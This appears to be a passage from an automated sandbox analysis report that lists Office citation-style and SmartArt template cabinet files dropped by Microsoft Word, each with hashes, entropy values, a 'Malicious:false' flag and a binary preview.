                                                                                                                            Preview:MSCF............D................................?..................................RadialPictureList.glox.................Content.inf....8....[.... $nq......C...../U..........a......S.Q...Q....j............(..z,.g.........^...Y..D... #i.TH5.<.=N..$..7.p".7.............`.3..1~,=,(.d8.Z.1....4'G.....!W^gClf._j.-N..&k.....Y3` =.(S..B^...i.zB.U....0O..h...I.(.......L...5.X.8.Sc<=>w.=.?&.....mR.......x.......mpW.T..^.FU...SN.C)......vsa.,x......,....E..i>..[g...#t...M..GR.9..$/4.:..q.bc9..x{bC.0..K.)..t.Y.&.v.d.16.B..c..or..W.,.B.........O.0..k.v........*F+..U.w...d...o8......A).}...#......L.!?.U.r.^.$...e.(..PG)8..+.9.5.l}.)..b.7+. 4....-.lC...|..j..Q.,.....7.W...|;j...%...:...|H..........<..%...K.....Fy.q$.k..}..8.9.M.u.?$].......r.....e.|..._..iT.;Dq5[....f.s..P.......e.T....!Y{.....t.wm..A..w-..7...3..T.:8.4.a[.Oo.. V.l.@.}..........E.&..J.....+..+.9)9<.._R.Hb.....V..Qu....:v.t.Li.0..J..V..b...!..N....-mD..c..(.[&o>.M.b..H.q..lk../..........W.8..z..B...
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 7453 bytes, 2 files, at 0x44 "pictureorgchart.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):23597
                                                                                                                            Entropy (8bit):7.692965575678876
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:y6aR//q0bJi/Uj+957G8E0GftpBj/4YOFLrHRN7LxhKll7PK/ph:y6I/Li/UjmVG8PiZ4YsLxh6Ih
                                                                                                                            MD5:7C645EC505982FE529D0E5035B378FFC
                                                                                                                            SHA1:1488ED81B350938D68A47C7F0BCE8D91FB1673E2
                                                                                                                            SHA-256:298FD9DADF0ACEBB2AA058A09EEBFAE15E5D1C5A8982DEE6669C63FB6119A13D
                                                                                                                            SHA-512:9F410DA5DB24B0B72E7774B4CF4398EDF0D361B9A79FBE2736A1DDD770AFE280877F5B430E0D26147CCA0524A54EA8B41F88B771F3598C2744A7803237B314B2
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF............D................................?..................................pictureorgchart.glox.................Content.inf.W..y....[.............../.jC....U.CUUUTU.5...jjPU..MP....T..0*....o0.......Y.=....P.({.3.p..."pA!>r../3.q..7...........!...TO....(..%......6...3E?....~......CZmndse.Qy....p....h....=.:5...F..%.E.&.v.`I~. ..%._..b]..Y..Q..R.........nN.q8c..a..L..X/.M...PP.q..SpZ.K]>D"Pf..B.c....0..|I.Q.,.g/..Kev.../..=......w..}3.....(....+#T.....K`N.u..Z.....rriK.(...(...6.<R.%.]..NX..b..].C.u....++......Ia.x. .7....J.#............w>....7..R...H>....@%....~.yA.......~.UB..*. .P..$...-...v.....=M."....hw..b....{.....2pR....].C..u@=G."Y..;..gc/N.N.YB.Z.q.#....$....j.D.*.P..!.)S.{..c....&'E.lJ%.|O.a...FG.|.....A..h.=c7.)d.5...D...L...IQ..TTE.*NL-.*M..>..p0.`......m..,.w#rZ..wR\@.Wn..@Q...}..&...E...0K.NY....M.71..`.M./:.>..._L..m...,U.l....._fi...nj9..,..w.s.kJ.m.s.M.vmw.!.....B.s.%.-').h.....)c.l....F..`3r...-.....0..7..&N.....n.#H...<7
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 6196 bytes, 2 files, at 0x44 "ThemePictureGrid.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):22340
                                                                                                                            Entropy (8bit):7.668619892503165
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:GByvLdFHny7G8E0GftpBjE8upFLrHRN778lvQyUTL2mm2y:Oy3HkG8Pi6887mvU+ma
                                                                                                                            MD5:8B29FAB506FD65C21C9CD6FE6BBBC146
                                                                                                                            SHA1:CE1B8A57BB3C682F6A0AFC32955DAFD360720FDF
                                                                                                                            SHA-256:773AC516C9B9B28058128EC9BE099F817F3F90211AC70DC68077599929683D6F
                                                                                                                            SHA-512:AFA82CCBC0AEF9FAE4E728E4212E9C6EB2396D7330CCBE57F8979377D336B4DACF4F3BF835D04ABCEBCDB824B9A9147B4A7B5F12B8ADDADF42AB2C34A7450ADE
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF....4.......D...........................4....?..................1...............ThemePictureGrid.glox.....1...........Content.inf....K..5.[.... V.q......B.....?.h.i.J.D...Z...>.....i~...A...Z....H.hy.D..X.....>...L.I..`. z w0}.K`.C{h....W\../.U..p\%...B...;............9..8.^M.....].lP.p...|..?..M....E..S.`..-n........Q'.'.o..C}=..?`.bQ...J"0f.. ....k3n..F.Pu..#...w].`<...."D.].-.#+):..fe..=<.M...4..s.q.f._.=.*T.M..U.[R.kbw.,......t6_I...~.X..$_.q....}2..BR...).[...<.l.3........h%....2.$`>..hG...0.6.S......._3.d~1.c.2g....7tTO..F.D.f.Y..WCG.B..T....Gg&.U'....u.S/......&6w..[bc.4....R.e..f.,....l."........I....J.=~...$x.&2...+,-.;.v.'.AQ.fc...v._..rZ..TYR...g?..Z..!.3mP dj...../...+...q.....>..../...]P.z?DW&.p..GZ....R5n......,..]{].0m.9...o.{...e."...8VH....w"%;.g\.K..p.}....#r.u..l.vS...Y.7U.N*-E@.....~....E...x.....C.......{NP....5Ymk.*._.K...Z...f..;.......b.....,._@B..\.S..d.'\rs..].}.5"XJU.J..'.zk}.+P.)C.X.?9sx.D....(K....P^N_D...Z.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 15461 bytes, 2 files, at 0x4c "gostname.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):31605
                                                                                                                            Entropy (8bit):7.820497014278096
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:7SpOUxgQ9gFodHZktfHa2TSmcAg76j8/xorK0JoZgbA8E0GftpBjE2PzFLrHRN7S:OngHltf7Bcp/xoB3A8Pi625D8RA54
                                                                                                                            MD5:69EDB3BF81C99FE8A94BBA03408C5AE1
                                                                                                                            SHA1:1AC85B369A976F35244BEEFA9C06787055C869C1
                                                                                                                            SHA-256:CEBE759BC4509700E3D23C6A5DF8D889132A60EBC92260A74947EAA1089E2789
                                                                                                                            SHA-512:BEA70229A21FBA3FD6D47A3DC5BECBA3EAA0335C08D486FAB808344BFAA2F7B24DD9A14A0F070E13A42BE45DE3FF54D32CF38B43192996D20DF4176964E81A53
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF....e<......L...........................e<...?...................;......................gostname.xsl."...............Content.inf.[.......[...>..|..32.E..o`h....W.>.^...v..5...m.w.$.U..U......m.mu...'4....m`.9F.. ...I..PTS..O.D...GM#...#CUE.`.`%n..N...G,.~..+.6cv.L...G.m.Y..vy.....Yh9/.m,..wtw..;....Ka.a.{.\...'.....<X....%)...G..d......R./..4$..32..@....f.h....w..ov.}w..[.....{.v.......dr..&w#G..$3.zI&f..(C..L.z5J... .`...!.!4. ...!.` .$........w.J.X7.w_..@.w..f]=.C.....I-....s.s_.x...~..A... ...z...nM..;....Z....vt....6...~.w.....*x.g.h.T.J..-.3=....G.n..ti.A...s...j$.Bf..?......6.t.<j...>.."....&=BO?w.uN.o.t.-r..K....>C..^G..p...k...>.xZ.[fL..n.."].W#...|.i.0W.q.F: ..<#w......w....s....."...n.qu.../rI.....q....P~.B..|b?.N.}..MyO..q..:q.7..-~.xa.S...|.....X.....g.W.3.mo..yy.GG.s>....qy....r........#.F.P..A.......A....b.2..14.8.i6..w.S...v~{0z.<.Z...^!.;2mSV.i....{...U...+...r.;...h.++..T6.a...$....j5F+..1t....b......|.Q\d-.S..2... ......Y..A...s....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 14939 bytes, 2 files, at 0x44 "CircleProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):31083
                                                                                                                            Entropy (8bit):7.814202819173796
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:0XbSq3W46TVZb5fOFo1HtZwGqtRT44hS+nyBoiuFgbA8E0GftpBjEcBFLrHRN7Ku:0XpOflfOFo1DMr/iuuA8Pi6cfKjW66b
                                                                                                                            MD5:89A9818E6658D73A73B642522FF8701F
                                                                                                                            SHA1:E66C95E957B74E90B444FF16D9B270ADAB12E0F4
                                                                                                                            SHA-256:F747DD8B79FC69217FA3E36FAE0AB417C1A0759C28C2C4F8B7450C70171228E6
                                                                                                                            SHA-512:321782B0B633380DA69BD7E98AA05BE7FA5D19A131294CC7C0A598A6A1A1AEF97AB1068427E4223AA30976E3C8246FF5C3C1265D4768FE9909B37F38CBC9E60D
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF....[:......D...........................[:...?...................A..............CircleProcess.glox......A..........Content.inf......9.B[.....@*........!...(A.D..K.W.wwpwJj\.K\w...]...K.!.....@0..?,...}won`... ....&I..(;.....X.u..^.R..^......_:....W>f\....T...B..i`|q.....................i.5....(........0q7@.@..F...?A.`.....,L.......5.+../56..a`....1C5..9.*I.N.......@|<+./......... .ya....>l.,t.......y.y5...FF.,F..jCA...SA..H....8u.L..eM?.w8.......~^.Mr.[...(.._......u..+.......j..TJ.:<.3.X`...U.bz...[...r-...[...+..B.......}...\'.i...C.8.B_...c.8</..s.....VQ.Y..m.,.j~;y ...2.5.VQ...K..jP..2..r-...HA...."..9).7.....5.E._.wq.......!.+n+.f...s].4M'.1&...5....4..k..NV.M1.7`a..<.P4.|.mrd.i.R...u...............v.}..n\.C$.....[..2c.^..W..g..._.0.C.o....%.z.!.;.@y.`\..UO#i.)...Q...........L. .\:_..H.{.W...@...T.4..A.a...Wo?o$4.....#.V.s8M.Gh..p?A...Y.....)...........r|...!..o9...8..%#.[....;...3<Z...g....~.Z....,.(...qA.'x#..xC..@...HOuW.[.[....c.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 15327 bytes, 2 files, at 0x4c "sist02.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):31471
                                                                                                                            Entropy (8bit):7.818389271364328
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:eNtFWk68dbr2QxbM971RqpzAA8Pi6TlHaGRA5yr:eNtEkpGSbuHAkP7TlHaGq54
                                                                                                                            MD5:91AADBEC4171CFA8292B618492F5EF34
                                                                                                                            SHA1:A47DEB62A21056376DD8F862E1300F1E7DC69D1D
                                                                                                                            SHA-256:7E1A90CDB2BA7F03ABCB4687F0931858BF57E13552E0E4E54EC69A27325011EA
                                                                                                                            SHA-512:1978280C699F7F739CD9F6A81F2B665643BD0BE42CE815D22528F0D57C5A646FC30AAE517D4A0A374EFB8BD3C53EB9B3D129660503A82BA065679BBBB39BD8D5
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF.....;......L............................;...?...................;......g...............sist02.xsl.................Content.inf....!....[...=.rF..3U.5...g.i?..w.oY..If'.......Y.;.B.....Wo.{T.TA.~......8......u.p....@Q..k.?.....G....j.|*.*J69H.2.ee..23s..;3..i..L.,...0se.%J........%.....!.....qB...SC...GAu5.P..u7....:.|.$Fo............{.......v.v.g..{o....e.....m.JeRG..,.%.1..Lh.@8.i.....l.#.HB`B....C......D@....?....P?..................|.9..q.......9.n.....F...s,....3..Q..N......y......_i..9|.<w...'q.Tq...U.E.B...q.?.4..O(_O.A.......*jC.~.21.7.....u.C...]uc.....-.g.{C~9q.q.1.1...4..=.0.Z.^....'../....-.6.K.....K...A#.GR..t.@.{.O.......Q5..=....X...^...F3.e.E.Z..b+R..?Z..0T1.....gQz.&....%y=zx.f.....6-*...u.Rm..x<...?...!g@.}..).J...:*...9.s&.v..}..'...\..Sd..F...........kQr.....h..3..1....B...B{M...%O.59.\.#....s/.pE.:}...k_.P.>.zj....5|.9+....$M..L........(...@#.....N.....N.*..........E..7..R$.:9!r>7.....v...>..S.w....9..]..n.w.;&.W..<r\S....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 19375 bytes, 2 files, at 0x4c "turabian.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):35519
                                                                                                                            Entropy (8bit):7.846686335981972
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:2LFougzHaUdBKUsM+Z56zBjA8Pi6bo+ld8IX:MFodzHaULR9P7bo+l6IX
                                                                                                                            MD5:53EE9DA49D0B84357038ECF376838D2E
                                                                                                                            SHA1:AB03F46783B2227F312187DD84DC0C517510DE20
                                                                                                                            SHA-256:9E46B8BA0BAD6E534AF33015C86396C33C5088D3AE5389217A5E90BA68252374
                                                                                                                            SHA-512:751300C76ECE4901801B1F9F51EACA7A758D5D4E6507E227558AAAAF8E547C3D59FA56153FEA96B6B2D7EB08C7AF2E4D5568ACE7E798D1A86CEDE363EFBECF7C
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF.....K......L............................K...?...................J.......@..............turabian.xsl."...............Content.inf._.......[...T.....C4.5...E0B.]...+.-f....rc.[52.$...a..I....{z...`hx.r...!.. $...l..\....#3EF..r..c;<p...&n.\b..K..0Y..c+.2...i..B..wwY..77,...........}.q.C.......n..,.....prrx.QHy.B#..,.'....3....%1.``..hf...~...[.[n.v.s..y.vw....;..s.G293G&H....$E......m.&^..iy/.4.C...D...".(H&..&.I4._...!...... ........q.k1.d.....qc.3.c.....;.5.......y}...}&...+.WAN.,zVY.Q....V.Tz........g..H..c...E2jY...4g?.yf<....V.M.s.$..k.Id....+..?..._.\.s.k..9..I%;.yWQ..S..]..*.n<.7........=......"Q.*E.....MG..j.Yt..!U....Q.j...v.h-.~b..e&.......;...\.....:.....=..Xv1&q........6\...xw.%*.VdS..H...o...s.....+..%[../>.t..I....F.....".G|.....=....[..S..3..a.C.ZZ...tK.6N..b........)>........I..m..QE.M.nv.MVl.....vCG>,.suP.gqo.rr....J`m....J.b..},[F*....e.A.]..r....C4.?JJs6..l.].9...Q.B.~.......\d%.X ...8A....rH....&?#...^.....4.h.{>
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 17466 bytes, 2 files, at 0x4c "chicago.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 10 datablocks, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):33610
                                                                                                                            Entropy (8bit):7.8340762758330476
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:IlFYcxiahedKSDNAPk5WEEfA8Pi6xnOKMRA58:2JitdKsNAM5WBDP7xOKMq58
                                                                                                                            MD5:51804E255C573176039F4D5B55C12AB2
                                                                                                                            SHA1:A4822E5072B858A7CCA7DE948CAA7D2268F1BB4B
                                                                                                                            SHA-256:3C6F66790C543D4E9D8E0E6F476B1ACADF0A5FCDD561B8484D8DDDADFDF8134B
                                                                                                                            SHA-512:2AC8B1E433C9283377B725A03AE72374663FEC81ABBA4C049B80409819BB9613E135FCD640ED433701795BDF4D5822461D76A06859C4084E7BAE216D771BB091
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF....:D......L...........................:D...?..................XC.....................chicago.xsl. ...............Content.inf.!..B...[...H."m..3C.6...WP!i/Z..vn._...^omvw+...^..L.4o...g..y......^..x...BH.B.K....w.....F........p ./gg.h.0I',.$..a.`.*...^..vi..mw..........K....oQ............P...#...3.......U(.=...q.~?..H..?.'I4'.......X...}w.vw.....f.n..f{3.....-....%dK&q..D.H.Z..h-..H.[$ %.."..e....1...$.............'.....B..%..4...&`S!DQ...M.......N~............S..'....M..4E.^..dej..i..+.`...6F%sJ....Q..d.(*.s.Z...U-5Eh.s.CK...K..X$......j..T.?.`.|...=..R...-7...*...TU.....7a...&I.noOK|.W.R-+S.d..rR.....{h.Y...)..xJ..=.XM..o...P'.I4m..~I..C..m.....f.....;{Mzg+Wm.~...z...r-.....eK...lj:^.1g5...7.h(T"..t?5......u.....G.Z<..sL.\{...8=t...Z...'tps.:...|....6.....S..X...I...6l.M.....aq.;YS....{:.&.'.&.F.l...\.[L.%.so\.v.Lo...zO.^^...p..*9k...).CC..F0>L...VUE4.......2..c..p.rCi..#...b.C@o.l.. E_b..{d...hX.\_!a#.E.....yS.H...aZ...~D3.pj: ss?.]....~
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 18672 bytes, 2 files, at 0x4c "APASixthEditionOfficeOnline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):34816
                                                                                                                            Entropy (8bit):7.840826397575377
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:i3R9VYnIYfPYmqX0CnF1SRHVnLG8Pi61YbEIFO:ih9VjYfPYlk+F1SJxP71YbEIFO
                                                                                                                            MD5:62863124CDCDA135ECC0E722782CB888
                                                                                                                            SHA1:2543B8A9D3B2304BB73D2ADBEC60DB040B732055
                                                                                                                            SHA-256:23CCFB7206A8F77A13080998EC6EF95B59B3C3E12B72B2D2AD4E53B0B26BB8C3
                                                                                                                            SHA-512:2734D1119DC14B7DFB417F217867EF8CE8E73D69C332587278C0896B91247A40C289426A1A53F1796CCB42190001273D35525FCEA8BA2932A69A581972A1EF00
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF.....H......L............................H...?...................G......................APASixthEditionOfficeOnline.xsl.H...............Content.inf..h;.....[...Q..\..3S.5..oVP!i/Z.Ls...]q$...xY..+W.qm..B..y/.5.s..x$../K./.x.$.....}.......\........LNf..Hd.&."Ip.L.Mr-@.D..kW~i...^.....F.....T.U....../..0..2.{.q.T.`'{.00.{.B...>.R..2....1.~_.f..s...........~....~[..v..w..v....$[K.r$#[6...d;[...#.9.-...G..Z..eAR.0")%JI?&....$..$.H..$(........f.> k....hP...p...!j.T......l7..../3..(2^V...#..T9...3.@[0...le:...........E....YP.\.....au1...\.S|..-.duN.Z..g.O......X8....1.....|,.f/..w.|Wk]zJz.g'./7h..+.....}............x....s.2Z\..W.{...O....W.{j.U..Q....uO=.p.M k.E.S{SUd.@....S.Syo8>......r......8..............Z?>.mUAg....?o....f.7..W.n...P..........d.S?...\..W`...c.ua..........#.Y...45...F(d.o\09^..[.}...BsT.SD..[l.8..uw.7l..S.9T.KR..o......V..]...M .....t.r...:P...M....4.F.....@..t.1t..S...k.2.|5...i.%H..<.J..*.0n.....lZ.....?.*?.~..O .)..
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 16689 bytes, 2 files, at 0x4c "iso690.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):32833
                                                                                                                            Entropy (8bit):7.825460303519308
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:+0TU06CkaUYMoi//YX428RaFA8Pi6e9iA4I3w:vICTm/QorUpP7eAA4I3w
                                                                                                                            MD5:205AF51604EF96EF1E8E60212541F742
                                                                                                                            SHA1:D436FE689F8EF51FBA898454CF509DDB049C1545
                                                                                                                            SHA-256:DF3FFF163924D08517B41455F2D06788BA4E49C68337D15ECF329BE48CF7DA2D
                                                                                                                            SHA-512:BCBA80ED0E36F7ABC1AEF19E6FF6EB654B9E91268E79CA8F421CB8ADD6C2B0268AD6C45E6CC06652F59235084ECDA3BA2851A38E6BCD1A0387EB3420C6EC94AC
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF....1A......L...........................1A...?..................S@......v...............iso690.xsl.................Content.inf.B.9.....[...A.c...32.E...P..'.^}.f...ikMJ....m..s..U.w{m{{...}n.4........I. ..9..d..I.......P|....F...F.......&&J.:I.34......+*M3..4mr.........m.r..m)....dK.wiw...H,...r........y.$..Cu...L...dH.../..V......g.PG$R39...4O..............{w..^....c.m.m.o.....#..Fgs..6.....b....3.I..O....B..B..1h"....K|f .41......_..g.N.<.>........(....o3a.M)....J..}....-......8.......g.hm!r<...-..1.1....q.?....S.m...`L.g#.K.igv.].ghD....L...p5..?.......iP.[JS.J..?z~.T/.Q...E.K.......P+\LW.-.c..[9.n.7.....P...*[.A1....m...4h.9...N[....h5 n%k.~RR.*c..n..=...4....).eH.-./..>....*.r..S.*..dE.........pF..s.A..?...f..u.+.{..?>N.4].}Xb.M......y......'.2..'..........J4{r..r.3........5>..a0.>.u_.y@g....+y.yu--,ZdD.........5]3..'.s...|.....K.....T..G.G.e...)..\x..OM.g...`..j0......BfH...+.....:......l`.qU...;.@...",.."........>;P.B.^F...3!......Rx.9..
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 12767 bytes, 2 files, at 0x4c "ieee2006officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):28911
                                                                                                                            Entropy (8bit):7.7784119983764715
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:WnJY165YD0tPYoCKa3HueqRyzVscLk1Yj2GjcgbA8E0GftpBjE2kWTpjFLrHRN7N:X4rtPzCK6uRoljXBA8Pi62ZphL0HRA5p
                                                                                                                            MD5:6D787B1E223DB6B91B69238062CCA872
                                                                                                                            SHA1:A02F3D847D1F8973E854B89D4558413EA2E349F7
                                                                                                                            SHA-256:DA2F261C3C82E229A097A9302C8580F014BB6442825DB47C008DA097CFCE0EE4
                                                                                                                            SHA-512:9856D88D5C63CD6EBCF26E5D7521F194FA6B6E7BF55DD2E0238457A1B760EB8FB0D573A6E85E819BF8E5BE596537E99BC8C2DCE7EC6E2809A43490CACCD44169
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF.....1......L............................1...?...................0......"}..............ieee2006officeonline.xsl.:...............Content.inf.........[...G."...3$pE...G B....m3o[...I2&.f.,\..........}.n..{..e.8!^.3.A@...x..... .D.52gU..]..."..N8....s..CS..J3..HV...m...y..o....F.z......V.j._....=~k.....'.dY........1........#...d13.g.&C...C.xw.`f.hf..........]M....m.m....ud...,+.H~..cL...e#;(RI...eA....I.b...E...2..(...$.j...L...$..A....'[...H9..&..G.Q....".M.yl....]..?j%+....O~.*....|.se...K\.B"W..F.5.......=s...l.Y...K..yN.TBH[...sTWR.N.d...WEa....T.d.K.^sauI......m..s=.,qso5.b.V.s.]..9..,k4.\..L.;D...........;r.C...7.w.j..:N8.V6..a.3..j:A.mA..To..$.5....:./..p.x.3.=..__...8.EB.K.*..].-."..5-XU..J.....=o..K.Wavg.o].z.9.gk.._.........MZ.<.5............OY.n.o...r.9v.c.......[n.[..D...d..}.j.....LB,]_.9..St.@..C....\...^....-&.njq..!P....G^.....w.7.p~.......M..g.J............t1......q.w.rx...qp.....E.........-...2..G.........z.]B........d....C.@...@.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 3144 bytes, 2 files, at 0x44 "VaryingWidthList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):19288
                                                                                                                            Entropy (8bit):7.570850633867256
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:5ZII4Hf+7G8E0GftpBjCwBFLrHRN7bcClvQyUTL2mH:pG8PicgbcAvU+mH
                                                                                                                            MD5:B9A6FF715719EE9DE16421AB983CA745
                                                                                                                            SHA1:6B3F68B224020CD4BF142D7EDAAEC6B471870358
                                                                                                                            SHA-256:E3BE3F1E341C0FA5E9CB79E2739CF0565C6EA6C189EA3E53ACF04320459A7070
                                                                                                                            SHA-512:062A765AC4602DB64D0504B79BE7380C14C143091A09F98A5E03E18747B2166BD862CE7EF55403D27B54CEB397D95BFAE3195C15D5516786FEBDAC6CD5FBF9CD
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF....H.......D...........................H....?..................................VaryingWidthList.glox.................Content.inf...O.....[.... v.q......R.....>.%i.I.HhD.V...qt.....'....N...!..aw$(J.%(..A..h......l|.D.p9`..Y09.:.u....p. :,.*.YD=0.p. ......w.........*..<..;.....u.."......7[....8.....?^........-..;q.|.....B....PJ....r.K#.#.0'...}.........+gpR...T....5.iu.^I...A\..gK....}..z.B.nT.../.m.......N....E'1.E.\..o.....W..R.#.#...8.7...R.SbW-...%......$.obj.F..W_@....sY!........s.O..."k. ..b....j....v...P.\....7d...|"J.T...2p..m.&..r..,2.).....X.`...xt].U...b.h..V.....|L..N.Z.O#....o...1R.w30.g..?;..C.T.:$..MGY.C"i\.f..#..<.k...m..s.w. ..Ga].....wt.h|.Ta<.......(SO.]9.%a..Z... r._JH.=O...P.9a.v.....Kj.".T...m...4.?...F...$...y.....hbW.UA..u.&)....py.C{.=t.....n...}|H3A9.=..W..JJ..y./Y.E.M9..Z..w. .HB.YoIi..i.e..9;n...SpHw,....f....d>..g.m..z...... ...f...KP.M..U.....~vFD.fQ.P?......2!.n.....`@C!G...XI.].s,.X.'...u.E.o..f
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 14864 bytes, 2 files, at 0x4c "mlaseventheditionofficeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):31008
                                                                                                                            Entropy (8bit):7.806058951525675
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:ktH7oN/HbwiV+M+4Jc+5UrT3czi5uOHQA8Pi6DxUR/WTZIy:87sPEANXJc+eTMsuzP7DmN0ZIy
                                                                                                                            MD5:E033CCBC7BA787A2F824CE0952E57D44
                                                                                                                            SHA1:EEEA573BEA217878CD9E47D7EA94E56BDAFFE22A
                                                                                                                            SHA-256:D250EB1F93B43EFB7654B831B4183C9CAEC2D12D4EFEE8607FEE70B9FAB20730
                                                                                                                            SHA-512:B807B024B32E7F975AED408B77563A6B47865EECE32E8BA993502D9874B56580ECC9D9A3FEFA057FDD36FB8D519B6E184DB0593A65CC0ACF5E4ACCBEDE0F9417
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF.....:......L............................:...?...................9......................mlaseventheditionofficeonline.xsl.L...............Content.inf.N.#.....[...>..9..3c.5...F.B.]Y.3..%d.8...v;....~Y.L.=..v..m.g...|K.B....$......s.......#CdE.p.p..@...j.Nl2'...L..N.G:-V:.d.....i..M........mK.w.....\W.<.`..b$.!..!3..rT.A..#.).;KZ...a.-..j&e`R.~7dIRS.I..f.ff....}.}....^[wo.uw..i.m7......v$.I..n....-.Z.M5...iH..Ea..., [..0.L...DH..." ..... .@...H.@..+...}.......*^..'.4*.tHa..f].gV..~.7V.....C..).(.U"..f.@l..j'..%\.u.UU.....9<13...5..=........./..Z..{..-.L].+Y.fL.<EJ.q..!.j....W..]E./.~Y>...GgQ..-....Q.C..5..T+...fO. .)..~.7..Y....+..U=.e..8w.m...._..S..v.d.* ......S3z.X)......u...t.......i.;.a...X.Ji....g.3.!.O.....T.f6..[U....O..Z.X.q.G....?.k]..?...8.u.;].8y.T.9D..!?R....:........3+.P.....7?m}..............1...y3.g.\c.ks^;?.f.U5...U.j....E.N.}.!.......).R1....~.....R.....3.J.f...l..E^:...&_..%..v...^..E...rC..O....M.#..<..H..bB.+.W..
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 14813 bytes, 2 files, at 0x4c "iso690nmerical.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 7 datablocks, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):30957
                                                                                                                            Entropy (8bit):7.808231503692675
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:rKfgT03jNkAFbgUQWtxq9OGh1bBkd/1MVHb5iVOdMgbA8E0GftpBjEl8tFLrHRNF:r303jOrUQAkfhopWHbA8Pi6l8zuUIq
                                                                                                                            MD5:D3C9036E4E1159E832B1B4D2E9D42BF0
